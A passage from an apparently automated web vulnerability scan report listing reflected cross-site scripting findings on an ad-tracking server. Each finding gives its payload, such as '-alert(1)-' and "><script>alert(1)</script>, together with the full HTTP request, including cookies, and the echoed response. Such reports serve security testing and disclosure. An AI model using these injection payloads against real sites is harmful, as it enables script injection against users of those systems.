Path:   /2/TRACK_Xaxis/1438791285@x54

Issue detail

The value of the &_RM_HTML_url_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f17b'-alert(1)-'4fa911899ce was submitted in the &_RM_HTML_url_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1438791285@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/solutions4f17b'-alert(1)-'4fa911899ce&_RM_HTML_title_=Solutions%20-%20Xaxis&_RM_HTML_referer_=&Section=Solutions HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/solutions
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206399

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:23 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2012
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
preload the image request and does not contain 247SEO argument = "N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/solutions4f17b'-alert(1)-'4fa911899ce&_RM_HTML_title_=Solutions%20-%20Xaxis&_RM_HTML_referer_=&Section=Solutions';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction
...[SNIP]...

1.206. http://b3.mookie1.com/2/TRACK_Xaxis/1438791285@x54 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1438791285@x54

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de44a"><script>alert(1)</script>c65a5f2b13a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Xaxisde44a"><script>alert(1)</script>c65a5f2b13a/1438791285@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/solutions&_RM_HTML_title_=Solutions%20-%20Xaxis&_RM_HTML_referer_=&Section=Solutions HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/solutions
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206399

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:41 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 330
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Xaxisde44a"><script>alert(1)</script>c65a5f2b13a/923751385/x54/default/empty.gif/726348573830334f56626741436d4566?x" target="_top"><IMG
...[SNIP]...

1.207. http://b3.mookie1.com/2/TRACK_Xaxis/1438791285@x54 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1438791285@x54

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5159"><script>alert(1)</script>3c6e9657592 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Xaxis/1438791285@x54d5159"><script>alert(1)</script>3c6e9657592?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/solutions&_RM_HTML_title_=Solutions%20-%20Xaxis&_RM_HTML_referer_=&Section=Solutions HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/solutions
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206399

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:43 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 323
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Xaxis/1271421515/x54d5159"><script>alert(1)</script>3c6e9657592/default/empty.gif/726348573830334f56626741436d4566?x" target="_top"><IMG
...[SNIP]...

1.208. http://b3.mookie1.com/2/TRACK_Xaxis/1438791285@x54 [Section parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1438791285@x54

Issue detail

The value of the Section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload abb35'-alert(1)-'0f9fc7a2f26 was submitted in the Section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1438791285@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/solutions&_RM_HTML_title_=Solutions%20-%20Xaxis&_RM_HTML_referer_=&Section=Solutionsabb35'-alert(1)-'0f9fc7a2f26 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/solutions
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206399

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:35 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2012
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...

imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/solutions&_RM_HTML_title_=Solutions%20-%20Xaxis&_RM_HTML_referer_=&Section=Solutionsabb35'-alert(1)-'0f9fc7a2f26';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection='';
var page=''
...[SNIP]...

1.209. http://b3.mookie1.com/2/TRACK_Xaxis/1438791285@x54 [_RM_HTML_referer_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1438791285@x54

Issue detail

The value of the _RM_HTML_referer_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10a6b'-alert(1)-'1de419fd19d was submitted in the _RM_HTML_referer_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1438791285@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/solutions&_RM_HTML_title_=Solutions%20-%20Xaxis&_RM_HTML_referer_=10a6b'-alert(1)-'1de419fd19d&Section=Solutions HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/solutions
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206399

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:31 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2012
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
ument = "N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/solutions&_RM_HTML_title_=Solutions%20-%20Xaxis&_RM_HTML_referer_=10a6b'-alert(1)-'1de419fd19d&Section=Solutions';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsectio
...[SNIP]...

1.210. http://b3.mookie1.com/2/TRACK_Xaxis/1438791285@x54 [_RM_HTML_title_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1438791285@x54

Issue detail

The value of the _RM_HTML_title_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fddaf'-alert(1)-'f9b6676c680 was submitted in the _RM_HTML_title_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1438791285@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/solutions&_RM_HTML_title_=Solutions%20-%20Xaxisfddaf'-alert(1)-'f9b6676c680&_RM_HTML_referer_=&Section=Solutions HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/solutions
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206399

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:27 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2068
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
contain 247SEO argument = "N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/solutions&_RM_HTML_title_=Solutions%20-%20Xaxisfddaf'-alert(1)-'f9b6676c680&_RM_HTML_referer_=&Section=Solutions';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section
...[SNIP]...

1.211. http://b3.mookie1.com/2/TRACK_Xaxis/1438791285@x54 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1438791285@x54

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 371c0'-alert(1)-'939e61e8ef5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1438791285@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/solutions&_RM_HTML_title_=Solutions%20-%20Xaxis&_RM_HTML_referer_=&Section=Solutions&371c0'-alert(1)-'939e61e8ef5=1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/solutions
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206399

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:39 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2015
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//ww